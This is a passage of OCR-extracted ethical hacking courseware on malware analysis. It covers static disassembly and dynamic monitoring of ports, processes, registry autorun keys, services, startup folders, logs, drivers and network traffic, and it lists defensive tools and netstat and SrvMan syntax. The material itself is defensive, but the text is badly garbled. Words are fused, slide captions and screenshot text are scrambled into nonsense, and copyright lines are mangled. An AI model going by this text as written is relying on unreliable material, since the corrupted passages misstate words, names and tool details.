analyze thesefiles,as theycan provide informationaboutmalwarei n a file. Filedependencies
includelinkedlibraries, functions,and functioncalls.Check the dynamically linkedlist i n the
malwareexecutablefile. Finding out all the library
functionsmay allowyou to guesswhatthe
dll
Kernel32.dl
Corefunctionality,
suchas
of contents
Description
accessandmanipulation
of memory,
files,
andhardware
Providesaccess to advanced
c ore Windows suchas the
components
Advapi32.all
i ServiceManager andRegistry
User-interface
User32dll_—| components, suchas buttons,
scrollbars, and
componentsfor controlling
andrespondingto user actions
Gdi32.d!1
|
Functions displaying
for
andmanipulating graphics
ical andCountermensores
Mackin ©by E-Comel
Copyright
Neal. Interface
tothe
Windows
kernel
||
WSock32.dll
and Networking
DLLsthat help
to connect to a networkor perform
Ws2_32.dInetwork-related
tasks
|
Wininet.dll__ Supports
higher-level
networking
functions
Walker to identify
the dependencies
within the
executable
=
file
Dependency
Walker
http://www.dependencywalker.com
Source:
Walker application
Dependency
calls.Furthermore,
listsall the dependent
tree diagrams.
hierarchical
modulesof an executablefile and builds
It alsorecordsall the functionsof eachmodule’s
it detectsmanycommon problems
exportsand
suchas missingand
invalid modules,import/export mismatches, circulardependency errors, mismatched
machinemodules, andmoduleinitializationfailures,
1 Wier
Dependency -ninormere]
Sag Buu :
Sects [tang
tetas
aie Fie
Te Sone Unk TeSa
7.73;Seeenshatof Depend
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
dependency
Someadditional extraction toolsare as follows
=
Dependency-check(https://jeremylong.github.io)
=
Snyk(https://snyk-io)
©
Hakiri(https://hakiri.io)
(https://retirejs.github.io)
Retire.js
ical andCountermensores
Mackin ©by E-Comel
Copyright
StaticMalwareAnalysis:
MalwareDisassembly
de ana uf or
{©Dasari
aa ton
nstructons
codeand
thebinary theassembly
ADA.
Yoais
oer
Wwindows,
delet
Uno Mac 8Xhosted
debe
mt
Seve
program
nd
Inspect
he lope recognise
This procesisperformed
potential
{ook such
thes
usingdebugang
(htn//wvmove. de)
a5 OlWObe
andTools
Disassembling Debugging
tpg
nind
Oe te
wb (tava era
Malware Disassembly
Thestatic analysis alsoincludesthe dismantling of a given executableinto binary
format to
studyi ts functionalities
andfeatures. Thisprocesshelps to identify
the languageusedfor
programmingthe malware, APlsthat reveal Its function, etc. Basedon the reconstructed
assembly code, you can inspectthe programlogic andrecognizeits threatpotential.This
process c an be performedusingdebuggingtoolssuchas IDAPro,andOllyDbg,
=
IDA
Source:https://www.hex-rays.com
IDAProis a multi-platform anddebugger
disassembler that exploresbinary programs,
for whichthe source codeis not alwaysavailableto create maps of their execution. It
showstheinstructions i n thesame wayas a processor
representation calledassembly language. executes
them,
i.e, i n a symbolic
Thus,i t is easyfor you to find harmfulor
malicious
processes.
Features:
©. Disassembler
a disassembler,
‘As IDAProexplores binary programs, for whichthe source codeis
not always to create mapsoftheirexecution.
available,
Debugger
debugger
‘The in IDAProis an interactive tool that complements the dissemblerto
performstatic analysis
i n one step.It bypasses the obfuscationprocess,whichhelps
the assembler to process thehostilecodein detail
ical andCountermensores
Mackin ©by E-Comel
Copyright
7.74:Seeenshatf IDAPro
Figure
Someadditionaldebugging
toolsare as follows:
=
Ghirda(heeps://ahidra-sre.org)
=
(https://rada.re)
Radare2
=
(htep://www.ollydbg.de}
OllyDbg
(htep://www.windbg.ora)
WinDbg
(https://docs.microsoft.com)
ProcDump
Modal
07
Page
tical
Making
and
Countermenso
CopyrightÂ
by Comet
MalwareAnalysis
Dynamic
Dynamiamass
ons oftwo stages:
tem Basairing
andHos Integrity
Monitoring
HostIntegrityMonitoring
nudesthefollowing
Hostintertymonitoring
gs
‘vert
Montoring
Monteine/mss atc
Malware Analysis
Dynamic
Dynamic malwareanalysis is the processof studying the behaviorof malwarebyrunning it i n a
monitoredenvironment.Thistypeof analysis requiresa safeenvironment, suchas virtual
machines andsandboxes, to deterthemalwarefromspreading. Theenvironment design should
includetools that can capture
feedback.Typically, virtualsystems of
everymovement the malwarei n detailandprovide
act as a basefor conductingsuchexperiments,
relevant
HostIntegrity
Monitoring
Hostintegritymonitoring
is the processof studyingthe changesthat havetakenplace
acrossa systemor machineafter a series of actions or incidents.It involvestaking
ical andCountermensores
Mackin ©by E-Comel
Copyright
snapshots ofthe system beforeandaftertheincidentor action usingthe same toolsand
analyzingthe changesto evaluatethe impact on the system
andits properties.
In malware analysis,
hostintegritymonitoring helpsto understandthe runtime behavior
of a malwarefile as well as its activities,propagationtechniques, URLsaccessed,
downloadsinitiated,etc
Hostintegrity
monitoring thefollowing:
includes
PortMonitoring
Monitoring
Process
Monitoring
Registry
WindowsServicesMonitoring
StartupPrograms
Monitoring.
Monitoring/Analysis
EventLogs
InstallationMonitoring
FilesandFoldersMonitoring
Device Drivers Monitoring
Traffic
Monitoring/Analysis
Network
DNSMonitoring/Resolution
API
Calls
Monitoring
ical andCountermensores
Mackin ©by E-Comel
Copyright
MalwareAnalysis:
Dynamic PortMonitoring
1a)Malwareprograms cortupt thesjstem andopensysteminput/output
portsto establshconnections
w ith emote
systems,networks,or servers to acomplish
varous malisous
tasks
|G. Use portmonitoring
establaned tools
to unknownsueh
and
to
sean for
anetstat TCPView
a sueplclouPaddresees
for suspcous ports andlook anyconnection
Port Monitoring
Malware programs corruptthe systemand open systeminput/output portsto establish
connectionswith remotesystems, or servers to accomplish
networks, various malicious
tasks.
Theseopen portscan alsoformbackdoorsfor other typesof harmfulmalwareand programs.
Openportsact as communication channels for malware.They open unusedportson the
machineto connect backto the malwarehandlers.Scanning
victim’s for suspiciousportswill
helpi n identifying
You can also determine
suchmalware.
whethermalwarei s tryingto accessa particular portduringdynamic
analysis
byinstallingportmonitoring toolssuchas TCPView andWindowscommand-line utility
toolssuchas netstat. Theseportmonitoring tools providedetailssuchas the protocolused,
localaddress, remote address,and state of the connection. Additionalfeaturesmay include
processname, process ID,remote connection protocol,etc.
=
Netstat
It displays
active TCPconnections, portson whichthe computer Is listening,
Ethernet
the IP routingtable,
statistics, IPv4 statistics (forthe IP,ICMP,TCP,and UDPprotocols},
and IPv6statistics(forthe IPv6,ICMPv6, TCPover IPv6,and UDPover IPv6protocols}.
‘When
usedwithout parameters, netstat displays onlyactive TCPconnections.
Syntax
netstat[-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
Parameters
©. -at Displays
all active TCP connections andthe TCP and UDP ports on whichthe
is listening.
‘computer
ical andCountermensores
Mackin ©by E-Comel
Copyright
: DisplaysEthernetstatistics,suchas thenumberof bytes
and packets
sent and
sn: Displays
active
can
received.Thisparameter becombinedwith -s.
TCP connections;however,addressesand port numbers are
expressed
numerically,
andno attemptis madeto determinenames.
-0:Displays active TCPconnections and includesthe process ID (PID) for each
connection. Youcan findthe applicationbasedon the PIDi n the Processes tab i n
TaskManager.
‘Windows Thisparameter can becombined
-r: Displays
command,
the contents of the IP routingtable.Thisis equivalent
to
the route print
Figure
7.7: Screenshot
of Netstat,
ical andCountermensores
Mackin ©by E-Comel
Copyright
TcPview
Source:https://docs.
microsoft.com
TCPViewis a Windowsprogram that showsdetailed listings
of all TCPand UDP
endpoints including
on the system, the localandremote addresses,
andthe state ofthe
TCPconnections,It provides
a subsetof the Netstatprogram that ships
with Windows.
TheTCPViewdownloadincludes a command-line
Tepvcon, version with the same
functionality.
WhenTCPViewruns, it enumerates all active TCPand UDPendpoints,
all IP addresses
resolving to theirdomainnameversions.
Figure776:
Screenshot
ofTPÂ¥iew
Someadditionalportmonitoring
toolsare as follows:
+
PortMonitor (https://www.port-monitor.com)
+
CurrPorts (https://wwwnirsoft.net)
TCP (https://www.dotcom-monitor.com)
PortMonitoring
(http://www.
PortExpert kesoftwares.com)
NetworkMonitor (https://www,paessler.com)
PRTG
ical andCountermensores
Mackin ©by E-Comel
Copyright
MalwareAnalysis:
Dynamic ProcessMonitoring
tenulne
Windows
their
“a: themselves
Mabwareproramscamoutage Process
Monitor
enue Windows
series
PEs
proceses
(Portable
various processes veh
TheProcessM onitor
shows
rd proces/thread acy
—
thefil
realtime sate, Registry,
as or web browsers)
explorerexe
toolsikeProcessMonitor
Use process monitoring
Saibc eae ear RaSM
to sean forsupicious
processes,
Monitoring
Tools
Process
Process
ler hte //ecsmost com)
Borer
‘pom hp /ptemespoeenet)
ProcessMonitoring
Malwareenters the systemthrough images, music files,
videos,
etc., whichare downloaded
from the Internet,camouflage themselvesa s genuineWindowsservices, and hidetheir
processes to avoid detection.Somemalwaresuse PESto injectthemselvesinto various
processes(such a s explorer.exe
or web browsers).Maliciousprocesses are visiblebut appear
legitimate;
hence,
theycan bypass
desktop
firewalls.Attackersuse specific
rootkit methodsto
so that the antivirus softwarecannot detectit easily
hidemalwarei n the system
Process monitoring helps i n understanding the processesthatthemalwareinitiates andtakes
over after execution. It is also necessaryto observethe child processes,associated handles,
loadedlibraries, functions, and execution flow of boottime processes to definethe entire
nature of a file or program, gather informationabout the processes running before the
execution of the malware, and comparethemwith the processesrunningafter execution.This
methodwill reducethe time takento analyze
the processesthat the malwarestarts. Use process-monitoring
detectsuspicious processes.
andhelpi n easyidentification all
the processes
toolssuchas ProcessMonitor to of
+
Process Monitor
microsoft.com
Source:https://dacs
Process Monitor is a monitoring tool for Windows that showsreal-timefile system,
and process/thread
registry, activity.It combinesthe featuresof two legacy Sysinternals
utilities,
Filemon
and Regmon,
richandnon-destructive
and adds an extensive list of enhancements,
filtering,
comprehensive
user names, reliable processinformation,
event properties
including
suchsessionIDsand
full thread stackswith integrated symbol
supportfor eachoperation, simultaneouslogging to
a
file,and so on, The unique
ical andCountermensores
Mackin ©by E-Comel
Copyright
featuresof ProcessMonitor makeit a core utilityin systemtroubleshooting
and
malwarehunting
toolkits
Feature:
© More datacaptured
foroperation
inputandoutputparameters.
filtersthat can be set without losing
Non-destructive data.
Capture makesit possible
of threadstacksfor eachoperation to identify
the cause of,
‘operation
i n manycases.
Reliable
capture including
of processdetails, imagepath,
command
line,user, and
session ID.
Configurable andmoveablecolumnsfor any event property.
Filterscan beset foranydatafield,includingfieldsnot configured
as columns.
Advancedlogging architecturescalesto tens of millionsof captured events and
gigabytes of logdata
Process tree toolshows therelationshipsofall processesreferencedi n a trace.
27Process
Monitor.Syinternal:wo.sysinterale.com
Fle Edt Event Fiter Tools Options
Help
SE °BE/ FAG O HS RASH
SOFTWARE
ALANSeftrare
erent
Moosst
Window
Wows
Showing
183,571
of
36
696
events
($9) Backed
byvita memory
Screenshot
Figure 7.77: of ProcessMonitor
ical andCountermensores
Mackin ©by E-Comel
Copyright
Someadditional toolsare as follows:
monitoring
process
=
Process (https://docs.
Explorer microsoft.com)
*
(https://www.manageengine.com)
OpManager
+
Monit (https://mmonit.com)
(https://www.eset:com)
Sysinspector
ESET
Explorer
System (http//systemexplorer.net)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Continous
by
toring
entriesintotheeis
themaou programune automataly
‘hat
famteror dec bots
andensrng
the
whenever
Registry
Monitoring Tools
fe rare htns/vamchemtable
com
Registry
Monitoring
The Windowsregistrystores OSand program configuration details,suchas settingsand
options. storesits functionality.
If themalwareis a program,theregistry Themalware u sesthe
registryto performharmfulactivitycontinuouslybystoringentries in the registry
and ensuring
that themaliciousprogramruns whenever thecomputeror devicebootsautomatically.
Whenan attackerinstallsmalwareon the victim’s machine, it generates a registryentry.
Consequently,
various changes will be noticed, suchas the systembecomesslower, various
keep
advertisements poppingup,andso on.
Windowsautomatically sectionsof the registry:
executesinstructionsin the following
=
Run
=
RunServices
=
RunOnce
=
RunServicesOnce
=
HKEY_CLASSES_ROOT\exefile\shell\open\command
"%1"%*.
Malwareinserts instructions i n thesesections of the registry to perform maliciousactivities.
You shouldhavefairknowledge of the Windows its contents,andinner workings
registry, to
analyze the presenceof malware.Scanning for suspicious will helpto detectmalware.
registries
Useregistry monitoringtoolssuchas RegScanner to scan registryvaluesfor any suspicious
entries that mayindicatemalwareinfection.
ical andCountermensores
Mackin ©by E-Comel
Copyright
jv16PowerTools
Source:https://www.macecraft.com
Jv16PowerToolsis a PCsystem
and data,cleaning utility
software
the Windowsregistry,
that worksbyerasing unnecessaryfiles
automaticallyfixingsystemerrors, and
‘optimizing
It
your system.
i n detecting
helps registry
monitor Speedup
It allowsyou to scan and the registry.
entries createdbythe malware.The“Clean And
MyComputer― featureof Registry Cleanerin jv16PowerTools i s a solutionfor fixing
errors and system
registry errors and cleaning leftoversand unnecessaryfiles
registry
suchasold
log
files files.
andtemporary
Coday,
2 moment
Someadditional
registry
Figure7.78Screenshot
tools
monitoring are as
of
16 PowerTools
follows:
regshot(hetps://sourceforge.net)
(https://www.chemtable.com)
Reg Organizer
=
Viewer (https://accessdata.com)
Registry
(https://www.nirsoft.net)
RegScanner
Registrar
RegistryManager(https://www.resplendence.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
Malware
Dynamic Analysis:
Windows
ServicesMonitoring CEH
{©erploy
echaves
LOCAL
MACHINE
System)
Maware maya
ey ott to mano HEY curentantotetSercs
Manager
(Svan
{©UeeWindows eves mrtoringt0 ch 38 Windows
S ervice to aceaus sees nti
Monitoring
Tools ‘Windows
Service
into //ccuntyplode.com)
Netwreerie Montr(tps/Auwncnetarixcom)
‘virTsk (psa
Manager oniccom)
Series tp/wcactepicom)
WindowsServicesMonitoring
Attackersdesign malwareand other maliciouscode suchthat theyinstall and run on a
computer i n theformof services. Asmostservicesrun i n the background to supportprocesses
and applications, the maliciousservices are invisibleeven when theyare performing harmful
activities i n the system andtheycan functionwithout intervention or input.Malwarespawns
Windowsservices that allow attackersto remotely control the victim'smachineand pass
maliciousinstructions. Malwaremay alsoadopt rootkit techniques the following
to manipulate
registry keys to hidetheir processesandservices.
HKEY_LOCAL_MACHINE\System|CurrentControlset\Services
‘These
maliciousservices account or other privileged
run as a SYSTEM whichprovide
accounts,
greateraccess compared
to user accounts,making them more dangerousthan common
malwareand executablecode.Attackersalso try to concealtheir actions bynamingthe
to
maliciousserviceswithnamessimilar genuineWindowsservices avoiddetection.
fileduring
You can trace maliciousservices initiated bythe suspicious dynamic
analysis
using
to
Windowsservice monitoring tools suchas WindowsService Manager (SrvMan),
which can
detectchanges in services andscan for suspicious
Windowsservices.
*
WindowsServiceManager (SrvMan)
Source:http://tools.sysprogs.org
SrvMan hasboth GUI and command-line
modes.It can also be usedto run arbitrary
Win32applications
as services (when
sucha service is stopped, the main application
windowis automatically
closed).
ical andCountermensores
Mackin ©by E-Comel
Copyright
Youcan use SrvMan's to perform
interface
command-ine thefollowing
tasks:
Createservices
srvman.exeadd <file.exe/file.sys> [service name] [display nane]
[/type:<servicetype>] [/start:<start mode>][/interactive:no]
(/overwrite:yes]
Deleteservices
srvman.exe delete <service name>
Start/stop/restart services
srvman.exe start <service name> [/nowait] [/delay:<delay
in msec>]
srvman.exe stop <service name> [/nowait] [/delay:<delayin msec>]
srvman.exe restart <service name> [/delay:<delayin msec>]
Installandstart a legacydriverwith a single
call
srvman.exe run <driver.sys> [service name] [/copy:yes]
[/overwrite:no] [/stopafter:<msec>]
©
sere Manger
LE
Sree teed mee Sal nS riePerenitonet oer
Scr tery Moet Oe reservar)
Dresden eset
Neon
ACP Spleen
Syens@
Sense coe
Oren dire
een
‘Sin re Ei Sybex weno
AP
yontemnras) Aft hope Oe
Ateir
Sir Seed Pow
enna
Seams taeed 08s
itch. ee ete ae ave open bh Fee
Sirens leet sonen “ aren OPOORSS
Su0 seney rca cn Dina Veh
Cree)
Pose
NunaOws
we
Stenay
SomeadditionalWindows
service
Figure
779:Screenshot
monitoring
of Windows Manager
toolsare as follows:
Service
=
(https://securityxploded.com)
AdvancedWindowsServiceManager
(httpsi//processhacker.sourceforge.io)
Process Hacker
=
NetwrixService
‘AnVir
Monitor
(https://www.netwrix.com)
(https://www.anvir.com)
TaskManager
Services (https://www.activeplus.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Startup
Malware Analysis:
Dynamic Monitoring
Programs
©check
> windows
services
that
ae atomtialystred
GotoRun->Toeserves msc Sot Stu THPE
>
art
ciprosrmosa\wicosoWindow
mend\Proprams\strtop
Startup
Programs
Monitoring
Malware can alter the systemsettings to the startupmenu to perform
and add themselves
malliciousactivities whenever the systemstarts.Therefore,
scanningfor suspiciousstartup
programsmanually toolssuchasAutorunsfor Windowsis
or usingstartupprogrammonitoring
essentialfor detecting malware.
psto manually
Stey detecthiddenmalware:
‘=
Step1:Checkstartupprogramentries in the registry
Startupitems such as programs, shortcuts,
folders,
and drivers are set to run
automatically OS(e.g.,
at startupwhenusersloginto a Windows Windows
10).Startup
items can be added bythe programs or driversinstalled, or manuallybythe user.
Programs that run on Windows10 startupcan be located
i n theseregistry
entries,such
as Windows startupsetting,Explorer
startupsetting,andIEstartupsetting.
© WindowsStartup Setting
HKEY_LOCAL_NACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
KEY_CURRENT_USER\Sof
tware\Microsoft\Windo
HKEY_LOCAL,_NACHINE\S
crosoft\Windows\C
KEY_CURRENT_USER\Sof
tware\Microsoft\Windo
Explorer Setting
Startup
MACHINE\SOFTWARE\M
HKEY_LOCAL,_
r\shall Folders,crosoft\Windows\C
CommonStartup
HKEY_LOCAL,
r\Usar MACHINE\SOFTWARE\M
Shell crosoft\Windows\C
Folders, Conon Startup
ical andCountermensores
Mackin ©by E-Comel
Copyright
tware\Microsoft\Windows\CurrentVersion\Explorer
KEY_CURRENT_USER\Sof
\sheli Folders, startup
HKEY_CURRENT_USER\Sof
tware\Microsoft\Windo
\User shell Folders, Startup
le Startup
Setting
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\URLSearchiiooks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar
HKEY_LOCAL,_MACHINE\SOFTWARE\Microsoft\InternetExplorer\Extensions
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\MenuExt
=
Step
2: Checkdevicedriversautomatically
loaded
Navigate \Windows\system32\drivers
to C: to checkthe devicedrivers.
Sews
Hee
Swe
Figure displaying
7.80:Screenshot vers folder
3: ini
Check
(bootmgr)
Step Checkboot.
(bootmgr)
entries
boot.inior bed
or bed
entries usingthe commandprompt.Open command
typebededit,
promptwith administrativeprivileges, and pressEnterto view all the boot
manager
entries.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Step
Figure
7.81; boot
info displaying
Screenshot
4: CheckWindowsservices that start automatically
Go to Run> Typeservices.mse and press Enter. Sort the services byStartup Type to
checkthe Windowsservices list for services that automatically start whenthe system
boots.
ical andCountermensores
Mackin ©by E-Comel
Copyright
782:Screenshoteisplaying
Figure services
‘=
Step5: Check
Startup
the
Startup
foldersstore applications
folder
or shortcutsto applications
that auto-start whenthe
systemboots. To checkthe Startup searchthe following
applications, locationsi n
Windows10:
© ¢:\ProgranData\Microsoft\Windows\Start
Menu\Programs\startup
© c:\Users\
Name)
\AppData
(User-
\Roaning\microsoft\Windows\StartMenu\Progras\startup
Anothermethodto
access startup foldersis as follows:
1. Press simultaneously
Windows+ R to openthe Runbox
2.
Type
shell: and
startup in
OK to
the
the
startup
box
folder
click to navigate
Fn Rivecmnpeninye
rex [i
Figure
783: shell:
command
Run
Screenshot
showing startup
ical Mackin
inthe box
©Wlosutitin
Mowe
Manas
Pon
784:Screenshot
Figure ofAutoruns
forWindows
Someadditionalstartupprograms monitoring
toolsare as follows:
+
WinPatrol(http://www.winpatrol.com)
=
Autorun (https://www.chemtable.com)
Organizer
©
(https://www.glarysoft.com)
QuickStartup
Pro(http://www.outertech.com)
Startéd
Startup
Chameleon (http://www.chameleon-managers.com)
Manager
ical andCountermensores
Mackin ©by E-Comel
Copyright
j
Malware Analysis:
Dynamic Monitoring/AnalysisC\EH
Event Logs
Log octvtes
(©
| |
aulyisis proceso anahing
computergenerstedrecordsor Splunk
Usetools
(©
the
to
oganalysis Splunk
(heeyArmnnogeriecont
(hes/wsotorinscem)
(tere com)
Event Logs
Monitoring/Analysis
Loganalysis
is a process that provides
the detailsof an activityor event that can extract
possible
attacksi n theformof Trojans worms
informationand helps
backdoor Trojans
i n identifying
or any possible
or
i n the system.
security
attacks(failed
It servesas
gaps.Thisprocesshelps
authentication/login
a primarysource of
i n detecting
attempts)
zero-day
whenlogs a re
analyzed for different components. Logmonitoring c an be performed for components that
perform security operations, suchas firewallsystems, IDS/IPS,web servers, andauthentication
servers. Thelogs also contain file types,ports,timestamps, and registry entries. In Windows,
system logs, application logs,
access logs,audit logs,
andsecurity logscan be analyzed i n Event
Viewerunderthesection“Windows Logs.―
Logsare locatedvia the following
paths:
system logs
Start > Windows
Administrative
Tools> EventViewer > WindowsLogs
System logs
Security
Tools> EventViewer> WindowsLogs
Start> WindowsAdministrative > Security
and
ApplicationsServicesLogs
Start> WindowsAdministrativeTools> EventViewer > Applications
andServices
Logs
ical andCountermensores
Mackin ©by E-Comel
Copyright
LogAnalysis
Tools:
=
Splunk
Source:https://www.splunk.com
Itis a n SIEMtool that can automatically
collectall the event logs
from all the systems
present in the network.Splunk
forwardersneedto beinstalledin all the systems i n the
networkthat needto be monitored,
andtheseforwarderswill transferthe real-time
logs
event to themain Splunk
fromthenetworksystems dashboard,
NewSearch
785:Screenshotof Splunk
Figure
Someadditionallogmonitoring/analysis
toolsare as follows:
=
=
ManageEngine
Logaly
EventLog
Analyzer
(https://www.manageengine.com)
(https://www-logaly.com)
SolarWinds (https://www-solarwinds.com)
Log& EventManager
Netwrix Event Log
Manager(https://www.netwrix.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
MalwareAnalysis:
Dynamic InstallationMonitoring
sd background
instalationsthatthemabware
Use tools
i nstalationmonitoring sch= Mirehusoft
Installation
Monitoring
Tools
Cervo Poa Manager tan comodo]
Installation Monitoring
Whenthe system any softwareapplication,
or user installsor uninstalls traces of the application
datamight remain on the system. To findthesetraces,youshouldknowthefolders modified
or
createdduring the installationprocessas well as the files and foldersthat have not been
modified bythe uninstallprocess.Installation monitoringhelps i n detecting
hiddenand
background installationsperformed bymalware.Toolssuchas SysAnalyzer can be used to
monitor the installationof malicious
executables.
Mirekusoft
InstallMonitor
Source:https://www.mirekusoft.com
MirekusoftInstallMonitor automaticallymonitors what is placedon your system and
It worksbymonitoring
allowsyou to uninstallit completely. as file and
resources (such
registry)
that are createdwhena programis installed.It providesdetailedinformation
aboutthe softwareinstalled.Furthermore,it helps
you to determinethe disk, CPU,and
memoryconsumption of yourprograms.It alsoprovides informationabouthowoften
you use different programs.
A programtree is a usefultool that can showyou which
programs were installedtogether.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Openin
ast
Sess
Gans ses
OSS)Conan
bee―
Regn:
Suretregate 0, 7a
Someadditional
installation
install
Monitor
7.86:Screnshot of Miekusof
Figure
toolsare as follows:
monitoring
=
(hetps://www.aldeid.com)
SysAnalyzer
=
AdvancedUninstallerPRO(https://www.advanceduninstaller.com)
=
REVO PRO(https://www.revouninstaller.com)
UNINSTALLER
ComodoPrograms (https://www.comodo.com)
Manager
ical andCountermensores
Mackin ©by E-Comel
Copyright
MalwareAnalysis:
Dynamic FilesandFoldersMonitoring
and
after
|@ Mawar programsnormally
modiysytem PAFile Sight
fles folders infecting «computer
“osnau whotsser teu orreing es
Shedetects ues copying sansoptonalyace sce
to
1 0 Use andoer egy chachrs h e PAL
Fle Sigh,
Tripwire, Netra
ond Autor
changesIn systemes and folders
Files andFoldersMonitoring
Malwarecan modify the system
filesandfoldersto save some informationi n them.Youshould
beableto findthefilesandfoldersthatthemalware creates andanalyzethemto collectany
relevantstoredinformation.Thesefilesandfoldersmayalsocontain hiddenprogramcodeor
maliciousstringsthat the malwarewould schedule for execution according
to a specified
schedule.
Scanfor suspiciousfilesand foldersusing tools suchas PAFile Sight,
Tripwire,
and Netwrix
Auditor,
to detectanyTrojans installeda swellas system
filemodifications.
=
PAFileSight
Source:https://www.poweradmin.com
PA File Sight and auditing
is a protection tool. It detectsransomware attackscoming
fromthenetworkandstopsthem.
Features:
Compromised are blockedfromreaching
computers fileson other protected
servers
on thenetwork
Detectsuserscopyingfilesandoptionally
blocksaccess
Real-time
alertsallowappropriate immediately
staffto investigate
Monitors who is deleting,
moving, or reading
files,
ical andCountermensores
Mackin ©by E-Comel
Copyright
PAFile
SicHT
@-
—
checking
Someadditionalfile integrity
787; Screenshot
Figure
toolsare as
ofPA
File
Sight
follows:
‘=
Tripwire andChange
Fileintegrity (https://www.tripwire.com)
Manager
=
=
Netwrix
(https://www.netwrix.com)
Auditor
(https://www.ionx.co.uk)
Verisys
Checker(https://www.cspsecurity.com)
CSPFileIntegrity
NNT Change
Tracker(https://www-newnettechnologies.com)
J
DeviceDrivers Monitoring CEH
MalwareAnalysis:
Dynamic
(2. Hatnare stale sngwth device dives DriverView
S
Ghtrengdawanenchesstwryraocance
> oman
Sftnare
ofthe
tslondadiss
cr desertion
| e.3]
‘Sytem
(© Gotonin m snfel2>
Type Enron
Gries ene orale ees
© river
ay
tern nee.
DeviceDrivers Monitoring
Malwareis installedon the systemalong with the devicedriverswhenthe user downloads
infecteddriversfromuntrustedsources. Themalwareuses thesedriversto avoiddetection
Onecan
to
scan for suspicious
device driversusing toolssuchas DriverViewandDriverDetective,
verifywhethertheyare genuine andwhethertheyhave beendownloaded
publisher's
original
site,
from the
788:Screenshot
Figure displaying
Windows
ical
Drivers
System
andCountermensores
Mackin ©by E-Comel
Copyright
Driverview
Source:https://www.nirsoft.net
TheDriverViewutilitydisplays
the list of all devicedriverscurrently
loaded i n the
i s displayed,
system.Foreachdriveri n the list,additionalinformation suchas load
of
addressthe driver,
Features:
description,
version, product
name, andmaker.
© Displays
thelistofall loadeddriversi n your system
©
Standalone
executable
©
Agievonoys 948
Apt
Vpn
scoot Diver
eran Netwok
©
O ne
Me
i
shea wore) Stem Appin Compa
Obs Kea Orne
@
Pere
i. orate
2
bette 1009 2009
sow. 5
cnr
ocussis on °
Screenshotof
Figure7.89: DverVew
Someadditional
devicedrivermonitoring
toolsare as follows
=
DriverBooster(https://www.iobit.com)
+
DriverReviver(https://www.reviversoft.com)
Driver (https://www.drivereasy.com)
Easy
Driver Fusion(https://treexy.com)
DriverGenius(http://www.
driver-soft.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
j
Dynamic
Malware Analysis: C/E
Network Traffic Monitoring/Analysis
(©programs
connect
bakto
hel
to
Malware
SolarWinds
NetFlow
handlers Traffic
Trafic
afi
tnd vendconfidentialAnalyzer
corelates
iformationatachers
network
scanners| the
va Anlye collects data, Riot
1@Use andpacket
snifers to monitor useable
formata n presensitto user na web-based
network
rafiegoing to maieou areas
remote networktrate
acefor monitoring
caning
tools
a8
(©Usenetwork such SolarWinds
Network
Ketiity
AnerTots
Campa
Network
Monitoring
(htpe/eclosoftcom)
PRTG
Network
Montor
Lancuard
Gr fps/vracom
hts paeslercom)
NetForANGuataanhtps//wwacnetfortcom)
NetworkTraffic Monitoring/Analysis
Networkanalysis
is the process of capturing it carefully
networktraffic and investigating to
identify
malwareactivity.It helpsto determine packets
the typeof traffic/network or data
transmittedacrossthe network.
Malware depends downloading
on the networkfor various activities suchas propagation,
maliciouscontent,transmitting andoffering
sensitive filesandinformation, remote controlto
attackers.Therefore,you should
adoptthat
techniques can detectmalwareartifactsand usage
across networks,Some malwareconnects backto the handlers
Informationto them
and sendsconfidential
Indynamic analysis,
you run a pieceof malwarei n a controlledenvironment that is installed
with various network monitoring tools to trace all the networkingactivities of the malware.
Network monitoring tools such as SolarWindsNetFlowTraffic Analyzer, Capsa Network
Analyzer, andWireshark, can beusedto monitor and capture livenetworktrafficto andfrom
thevictim'ssystem during execution of the suspiciousprogram. Thiswill helpto understandthe
malware’snetworkartifacts,
signatures, functions,andotherelements.
=
NetFlowTraffic
SolarWinds Analyzer
Source:https://www.solarwinds.com
NetFlowTrafficAnalyzer
collectstraffic data,converts it into a useableformat,
and
it to theuser in a web-based
presents interface
formonitoring
networktraffic
Features:
©
©
Network
traffic
analysis
Bandwidthmonitoring
ical andCountermensores
Mackin ©by E-Comel
Copyright
Application
trafficalerting
analysis
Performance
€BQ0S
policy
optimization
9
Malicious
malformed
traffic
or flowidentification
Nettiow
Analyzer
Tete
Summary
Natronures Top1 0Agplations
Figure
790:Sreenshot
of SoarWinds
NetFlowTraficAnalyzer
Someadditionalnetworkactivitymonitoring
toolsare as follows:
NetworkAnalyzer
Caspa (https://www.colasoft.com)
=
(https://www.wireshark.org)
Wireshark
=
NetworkMonitor (https://kb,paessler.com)
PRTG
(https://www.afi.com)
GF LanGuard
(https://www.netfort.com)
NetFort LANGuardian
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSMonitoring/Resolution
MalwareAnalysis:
Dynamic
(©nschanger
ofhanging isa
malcous
sofware
capable
atackers
control
ofthe
theese ONSserver atte
roves the wth the
and
DNSQuerySniffer
a networkane
DNSQuerySaileris uty thatshowstheDNS
DNS
RSs
Monitoring/Resclution
(tas //mendstcom)
Tools,
Sonake tntps/feonstebcom)
DNSMonitoring/Resolution
Malicioussoftwaresuchas DNSChanger can change the system's DNSserver settings,
thus
providingattackerswith controlof the DNSserver usedi n thevictim'ssystem. Subsequently,
theattackerscan controlthe sitesto whichthe user tries to connect throughthe Internet,
make
him/herconnect to a fraudulent or interfere
website, with his/heronlineweb browsing
Therefore,you shoulddeterminewhetherthemalware of changing
i s capable any DNSserver
settingswhile performing
dynamic analysis.
You can use tools suchas DNSQuerySniffer
and
DNSstuff,to verify
connection
the DNS
serverstriesto identify
thatthemalware to connect and the typeof
=
DNSQuerysniffer
Source:https://www.nirsoft.net
DNSQuerySniffer
is a networksniffer
utilitythatshowsthe DNSqueriessent on your
system.Forevery DNSquery, the following informationis displayed: host name, port
